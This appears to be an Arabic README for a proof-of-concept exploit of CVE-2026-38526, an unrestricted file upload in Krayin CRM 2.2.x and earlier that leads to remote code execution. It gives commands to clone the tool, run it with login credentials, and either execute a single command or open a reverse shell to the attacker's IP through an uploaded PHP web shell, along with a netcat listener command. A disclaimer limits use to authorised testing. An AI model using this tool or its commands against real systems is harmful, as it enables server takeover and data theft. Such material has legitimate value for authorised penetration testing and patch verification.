
إثبات مفهوم لـ CVE-2026-38526 في Krayin CRM <= v2.2.x. رفع ملف عشوائي يؤدي إلى تنفيذ تعليمات برمجية عن بعد.
Krayin CRM (≤ 2.2.x) - رفع ملف غير مقيد يؤدي إلى تنفيذ كود عن بُعد.
يستغل هذا الإثبات المفاهيمي (PoC) نقطة نهاية رفع TinyMCE الضعيفة (/admin/tinymce/upload) لرفع قشرة ويب PHP وتحقيق تنفيذ الأوامر على الخادم.
git clone https://github.com/pawpic/CVE-2026-38526-POC
pip3 install requests beautifulsoup4
الاستخدام
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
--lhost YOUR_IP \
--lport 4444
python3 exploit.py \
-u http://example.com \
-e [email protected] \
-p "example_pass" \
-c "whoami"
| الوسيط | الوصف | إلزامي |
|---|---|---|
| -u, --url | عنوان URL الأساسي للهدف | نعم |
| -e, --email | البريد الإلكتروني لتسجيل الدخول | نعم |
| -p, --password | كلمة المرور لتسجيل الدخول | نعم |
| -c, --cmd | تنفيذ أمر واحد | لا |
| --lhost | عنوان IP الخاص بك للقشرة العكسية | نعم (إذا لم تستخدم --cmd) |
| --lport | منفذ الاستماع | لا (الافتراضي: 4444) |
ابدأ المستمع:
nc -lvnp 4444
شغّل أداة الاستغلال:
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR
أداة الاستغلال هذه مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. الاستخدام غير المصرح به ضد أنظمة ليس لديك إذن صريح لاختبارها غير قانوني.
الإصدارات المتأثرة
Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526
المؤلف: pawpic التاريخ: 2026